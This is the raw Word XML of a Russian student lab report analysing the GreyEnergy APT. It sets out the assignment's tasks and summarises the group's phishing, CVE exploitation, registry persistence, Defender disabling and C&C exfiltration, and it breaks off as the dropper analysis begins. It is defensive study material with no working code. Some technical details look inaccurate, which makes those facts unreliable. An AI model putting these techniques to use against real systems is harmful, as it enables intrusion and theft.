    <w:p w14:paraId="17020542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доступ к критической информации (кража аутентификационной информации: пароли, история браузера и других приложений);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439074E4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реализация вредоносных действий (майнинг, разрушающее воздействие, шифрование);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E12659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взаимодействие с информацией, хранимой другими приложениями (браузеры, почта);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3388DDCE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990"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>изменение конфигурации системных и прикладных приложений (RDP, межсетевой экран, Windows Defender</w:t>
      </w:r>
      <w:r w:rsidRPr="00F918B9">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>и т.д.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B1E787" w14:textId="77777777" w:rsidR="004A0930" w:rsidRPr="006C5A8E" w:rsidRDefault="004A0930" w:rsidP="004A0930">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="0" w:firstLine="900"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C5A8E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Привести фрагменты ассемблерного</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006C5A8E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006C5A8E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">псевдокода (восстановленного кода на языке С) наиболее важных функций </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>В</w:t>
      </w:r>
      <w:r w:rsidRPr="006C5A8E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ПО</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>, выявленных в соответствие с п. 5 задания</w:t>
      </w:r>
      <w:r w:rsidRPr="006C5A8E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580BE8A7" w14:textId="3F559912" w:rsidR="004A0930" w:rsidRDefault="004A0930" w:rsidP="004A0930">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="0" w:firstLine="900"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Представить результаты изучения, используемого в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>APT</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD7FA9">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>программного</w:t>
      </w:r>
      <w:r w:rsidR="00792FE6">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> обеспечения в формате таблицы</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE93ADD" w14:textId="77777777" w:rsidR="004A0930" w:rsidRDefault="004A0930" w:rsidP="004A0930">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="0" w:firstLine="900"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Описать в отчете также следующую информацию касательно исследуемой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>APT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>-атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D841537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1080"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>цели атак;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2EAC27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1080"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>типовые сценарии атаки;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8F57D1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1080"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>описание используемых уязвимостей;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5228CC4F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1080"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">описание используемых сторонних средств (например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mimicatz</w:t>
      </w:r>
      <w:r w:rsidRPr="00D80AF4">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PSExec</w:t>
      </w:r>
      <w:r w:rsidRPr="00D80AF4">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>и т.д.);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0232D562" w14:textId="77777777" w:rsidR="004A0930" w:rsidRDefault="004A0930" w:rsidP="004A0930">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="0" w:firstLine="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>техники, используемые для обхода средств защиты и закрепления в системе;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7330CC8B" w14:textId="5B375169" w:rsidR="004A0930" w:rsidRDefault="004A0930" w:rsidP="004A0930">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>другая важная информация.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743B078D" w14:textId="3D6BD0BA" w:rsidR="00792FE6" w:rsidRDefault="00792FE6" w:rsidP="00792FE6">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc214273115"/>
      <w:r>
        <w:t>Ход работы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="15E5B40E" w14:textId="27B20105" w:rsidR="006A179F" w:rsidRDefault="00100757" w:rsidP="00100757">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc214273116"/>
      <w:r>
        <w:t>Исследование существующих публикаций</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="72DDED83" w14:textId="796B0A49" w:rsidR="00100757" w:rsidRDefault="001E0155" w:rsidP="00100757">
      <w:r>
        <w:t xml:space="preserve">GreyEnergy APT </w:t>
      </w:r>
      <w:r w:rsidR="00100757" w:rsidRPr="00100757">
        <w:t>— это киберугро</w:t>
      </w:r>
      <w:r>
        <w:t>за, предположительно связанная</w:t>
      </w:r>
      <w:r w:rsidR="00100757" w:rsidRPr="00100757">
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">группировкой </w:t>
      </w:r>
      <w:r w:rsidR="00100757" w:rsidRPr="00100757">
        <w:t>Sandworm (известной по атакам на украинскую энергосистему в 2015–2016 гг.). Группа активна с 2017 года и фокусируется на шпионаже и саботаже в энергетическом секторе, преимущественно в Украине и Восточной Европе. GreyEnergy эволюционировала из BlackEnergy (использовалась в атаках CrashOverride/Industroyer), добавив более модульную и скрытную архитектуру. Атаки направлены на сбор разведданных, кражу учётных данных и подготовку к деструктивным операциям (например, отключение инфраструктуры). По оценкам экспертов, GreyEnergy могла быть причастна к атакам на более чем 100 организаций в энергетике, телекоме и правительстве.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E9965D" w14:textId="65C63AB3" w:rsidR="001E0155" w:rsidRDefault="001E0155" w:rsidP="001E0155">
      <w:r>
        <w:t>Сценарии GreyEnergy следуют классической модели APT: начальный доступ через фишинг или эксплуатацию уязвимостей, закрепление, сбор данных и эксфильтрация</w:t>
      </w:r>
      <w:r w:rsidRPr="001E0155">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4334F7" w14:textId="61B315F0" w:rsidR="001E0155" w:rsidRDefault="001E0155" w:rsidP="001E0155">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Начальный доступ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C53B91B" w14:textId="26610434" w:rsidR="001E0155" w:rsidRDefault="001E0155" w:rsidP="00102252">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Фишинговые кампании с вредоносными вложениями (Word/Excel с макросами или RTF с эксплойтами). Например, в 2018 году </w:t>
      </w:r>
      <w:r w:rsidR="000E3FC9">
        <w:t xml:space="preserve">для этого </w:t>
      </w:r>
      <w:r w:rsidR="000E3FC9">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">использовалась </w:t>
      </w:r>
      <w:r w:rsidR="000E3FC9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>email</w:t>
      </w:r>
      <w:r w:rsidR="000E3FC9" w:rsidRPr="000E3FC9">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="000E3FC9">
        <w:t>рассылка с файлами</w:t>
      </w:r>
      <w:r>
        <w:t>, маскируемыми под резюме или счета.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025994DE" w14:textId="4097B5D1" w:rsidR="001E0155" w:rsidRDefault="001E0155" w:rsidP="00345FEC">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Эксплуатация уязвимостей в ПО: </w:t>
      </w:r>
      <w:r w:rsidR="00345FEC" w:rsidRPr="00345FEC">
        <w:t xml:space="preserve">связанной с некорректной обработкой OLE-объектов </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Microsoft Office), </w:t>
      </w:r>
      <w:r w:rsidR="00345FEC">
        <w:t xml:space="preserve">удалённым выполнением кода </w:t>
      </w:r>
      <w:r w:rsidR="000E3FC9">
        <w:t>для доставки вредоносного кода.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B0AC8A" w14:textId="624171AB" w:rsidR="001E0155" w:rsidRDefault="001E0155" w:rsidP="000E3FC9">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Закрепление и ра</w:t>
      </w:r>
      <w:r w:rsidR="000E3FC9">
        <w:t>зведка</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D80433" w14:textId="05EF8F27" w:rsidR="001E0155" w:rsidRDefault="001E0155" w:rsidP="00102252">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:t>Установка модульного бэкдора (GreyEnergy malware), который маскируется под легитимные процессы (</w:t>
      </w:r>
      <w:r w:rsidR="000E3FC9">
        <w:t xml:space="preserve">например, </w:t>
      </w:r>
      <w:r>
        <w:t>svchost.exe</w:t>
      </w:r>
      <w:r w:rsidR="000E3FC9">
        <w:t xml:space="preserve"> – главный процесс для служб, загружаемых из динамических библиотек</w:t>
      </w:r>
      <w:r>
        <w:t>). Добавление в автозагрузку через реестр (HKCU\Software\Microsoft\Windows\CurrentVersion\Run) или планировщик задач.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156B3659" w14:textId="5A5C1117" w:rsidR="001E0155" w:rsidRDefault="001E0155" w:rsidP="00102252">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:t>Сбор системной информации: перечисление процессов, пользователей, сетевых интерфейсов. Используется д</w:t>
      </w:r>
      <w:r w:rsidR="000E3FC9">
        <w:t>ля промышленных систем управления.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D10C481" w14:textId="6A439ADC" w:rsidR="001E0155" w:rsidRDefault="000E3FC9" w:rsidP="000E3FC9">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Сбор и эксфильтрация данных</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174F7058" w14:textId="52635F2A" w:rsidR="001E0155" w:rsidRDefault="001E0155" w:rsidP="00102252">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:t>Кража учётных данных (пароли, cookies из браузеров), скриншоты. Данные шифруются (XOR с RC4) и отправляются н</w:t>
      </w:r>
      <w:r w:rsidR="008E634E">
        <w:t>а C&amp;C-сервера через HTTP/HTTPS</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D63384D" w14:textId="48F6CEC3" w:rsidR="001E0155" w:rsidRDefault="001E0155" w:rsidP="00102252">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:t>Подготовка к латеральному перемещению</w:t>
      </w:r>
      <w:r w:rsidR="00FF0CA2">
        <w:t xml:space="preserve"> (распространение внутри сети)</w:t>
      </w:r>
      <w:r>
        <w:t>: сканирование сети на уязвимы</w:t>
      </w:r>
      <w:r w:rsidR="00FF0CA2">
        <w:t>е хосты.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C6CAEF" w14:textId="4C04FB6E" w:rsidR="001E0155" w:rsidRPr="001E0155" w:rsidRDefault="001E0155" w:rsidP="001E0155">
      <w:r>
        <w:t>Хотя GreyEnergy в основном шпионская, она наследует деструктивные возможности от BlackEnergy: потенциал для wiper-</w:t>
      </w:r>
      <w:r w:rsidR="00FF0CA2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>malvare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или DDoS на ICS</w:t>
      </w:r>
      <w:r w:rsidR="00FF0CA2" w:rsidRPr="00FF0CA2">
        <w:t xml:space="preserve"> (Industrial Control System</w:t>
      </w:r>
      <w:r w:rsidR="00FF0CA2">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>. В 2018–2019 гг. зафиксированы тесты на отключение энергосетей.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A767880" w14:textId="5A231C12" w:rsidR="001E0155" w:rsidRDefault="001E0155" w:rsidP="001E0155">
      <w:r>
        <w:t>Атаки GreyEnergy часто маскируются под легитимный трафик (имитация обновлений ПО) и используют инфраструктуру в ЕС/США для сокрытия.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C88012" w14:textId="6F886D01" w:rsidR="000E3FC9" w:rsidRPr="00102252" w:rsidRDefault="000E3FC9" w:rsidP="00102252">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Описание используемых уязвимостей</w:t>
      </w:r>
      <w:r w:rsidR="00FF0CA2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E5F722" w14:textId="34CE3717" w:rsidR="000E3FC9" w:rsidRDefault="000E3FC9" w:rsidP="00FF0CA2">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>CVE-2017-0199: Уязвимость в HTA-обработке</w:t>
      </w:r>
      <w:r w:rsidR="00FF0CA2" w:rsidRPr="00FF0CA2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FF0CA2">
        <w:t>(т</w:t>
      </w:r>
      <w:r w:rsidR="00FF0CA2" w:rsidRPr="00FF0CA2">
        <w:t>ехнология Microsoft, которая позволяет исполнять HTML-код как самостоятельную программу</w:t>
      </w:r>
      <w:r w:rsidR="00FF0CA2">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Microsoft Office, позволяющая удалённое выполнение кода через RTF-файлы. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7146CB93" w14:textId="19EE3412" w:rsidR="000E3FC9" w:rsidRDefault="000E3FC9" w:rsidP="00FF0CA2">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:t>CVE-2018-0802: Zero-day</w:t>
      </w:r>
      <w:r w:rsidR="00FF0CA2">
        <w:t xml:space="preserve"> (о</w:t>
      </w:r>
      <w:r w:rsidR="00FF0CA2" w:rsidRPr="00FF0CA2">
        <w:t>шибка или пробел в защите программного обеспечения, о которой разработчики ещё не знают и для которой отсутствуют патчи или обновления</w:t>
      </w:r>
      <w:r w:rsidR="00FF0CA2">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в Adobe Flash для выполнения shellcode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FCB4FF" w14:textId="34A8D285" w:rsidR="000E3FC9" w:rsidRDefault="000E3FC9" w:rsidP="00FF0CA2">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:t>CVE-2017-0144–0148: Для латерального перемещения в сетях, аналогично WannaCry, но</w:t>
      </w:r>
      <w:r w:rsidR="00FF0CA2">
        <w:t xml:space="preserve"> точечный</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B8785F" w14:textId="71C703CB" w:rsidR="000E3FC9" w:rsidRDefault="000E3FC9" w:rsidP="00FF0CA2">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:t>Другие: Уязвимости в VPN/Remote Desktop для доступа к корпоративным сетям.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B43B7D" w14:textId="2A1D3A68" w:rsidR="000E3FC9" w:rsidRDefault="000E3FC9" w:rsidP="00FF0CA2">
      <w:r>
        <w:t>GreyEnergy использует кастомный модульный фреймворк, написанный на C/C++ с элемен</w:t>
      </w:r>
      <w:r w:rsidR="00FF0CA2">
        <w:t>тами .NET. Основные компоненты:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675AF915" w14:textId="160E7CED" w:rsidR="000E3FC9" w:rsidRDefault="000E3FC9" w:rsidP="00FF0CA2">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r w:rsidRPr="000E3FC9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GreyEnergy</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0CA2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000E3FC9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Backdoor</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0CA2">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t>Модульный</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0CA2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000E3FC9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RAT</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0CA2">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="000E3FC9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Remote</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0CA2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000E3FC9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Access</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0CA2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000E3FC9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trojan</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0CA2">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0CA2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>плагинами</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0CA2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>для</w:t>
      </w:r>
      <w:r w:rsidR="00FF0CA2" w:rsidRPr="00FF0CA2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FF0CA2">
        <w:t>записи клавиш, скриншотов и кражи файлов</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0CA2">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00FF0CA2">
        <w:t xml:space="preserve">Коммуникация с помощью </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">HTTP </w:t>
      </w:r>
      <w:r w:rsidR="00FF0CA2">
        <w:t xml:space="preserve">к </w:t>
      </w:r>
      <w:r>
        <w:t>C&amp;C</w:t>
      </w:r>
      <w:r w:rsidR="00FF0CA2">
        <w:t>-серверам, обновляемыми динамически.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Энтропия высокая из-за </w:t>
      </w:r>
      <w:r w:rsidR="00FF0CA2">
        <w:t>упаковки пакетов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293A5BF3" w14:textId="27D6963A" w:rsidR="000E3FC9" w:rsidRPr="00FF0CA2" w:rsidRDefault="000E3FC9" w:rsidP="00FF0CA2">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:t>Electrum Loader: Дроппер/загрузчик, распаковывающий payload в память</w:t>
      </w:r>
      <w:r w:rsidR="00FF0CA2">
        <w:t xml:space="preserve"> для обхода антивируса</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE64867" w14:textId="0577F778" w:rsidR="000E3FC9" w:rsidRDefault="00FF0CA2" w:rsidP="000E3FC9">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GreyEnergy</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0CA2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>применяет следующие т</w:t>
      </w:r>
      <w:r w:rsidR="000E3FC9">
        <w:t xml:space="preserve">ехники обхода защиты: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">обфускация </w:t>
      </w:r>
      <w:r w:rsidR="000E3FC9">
        <w:t xml:space="preserve">кода, </w:t>
      </w:r>
      <w:r>
        <w:t>проверка на VirtualBox/VMware</w:t>
      </w:r>
      <w:r w:rsidR="000E3FC9">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> отключение Windows Defender через</w:t>
      </w:r>
      <w:r w:rsidR="000E3FC9">
        <w:t xml:space="preserve"> реестр</w:t>
      </w:r>
      <w:r w:rsidR="00102252">
        <w:t>. Закрепляется путем заражения</w:t>
      </w:r>
      <w:r w:rsidR="000E3FC9">
        <w:t xml:space="preserve"> DLL в</w:t>
      </w:r>
      <w:r w:rsidR="00102252">
        <w:t xml:space="preserve"> системных папках (%System32%) и создания фальшивых системных служб.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665D72FC" w14:textId="2E8B2E67" w:rsidR="00102252" w:rsidRDefault="00FD44CC" w:rsidP="00FD44CC">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc214273117"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GreyEnergyDropper.doc</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="2C7FF811" w14:textId="05B8E972" w:rsidR="00FD44CC" w:rsidRDefault="00FD44CC" w:rsidP="00FD44CC">
      <w:r>
        <w:t xml:space="preserve">В качестве первого файла для анализа был выбран </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GreyEnergyDropper</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD44CC">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>doc</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD44CC">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>Это документ, а не исполняемый файл, так что вероятно, е</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD44CC">
        <w:t>го задача — обманом заставить пользователя включить макросы, которые затем скачают и запустя</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">т настоящий вредоносный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD44CC">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5844E868" w14:textId="684F32A4" w:rsidR="00FD44CC" w:rsidRPr="00D56E94" w:rsidRDefault="00FD44CC" w:rsidP="00FD44CC">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Для начала загрузим файл в онлайн-песочницу </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00D56E94" w:rsidRPr="009226AB">
          <w:rPr>
            <w:rStyle w:val="aff3"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https</w:t>
        </w:r>
        <w:r w:rsidR="00D56E94" w:rsidRPr="009226AB">
          <w:rPr>
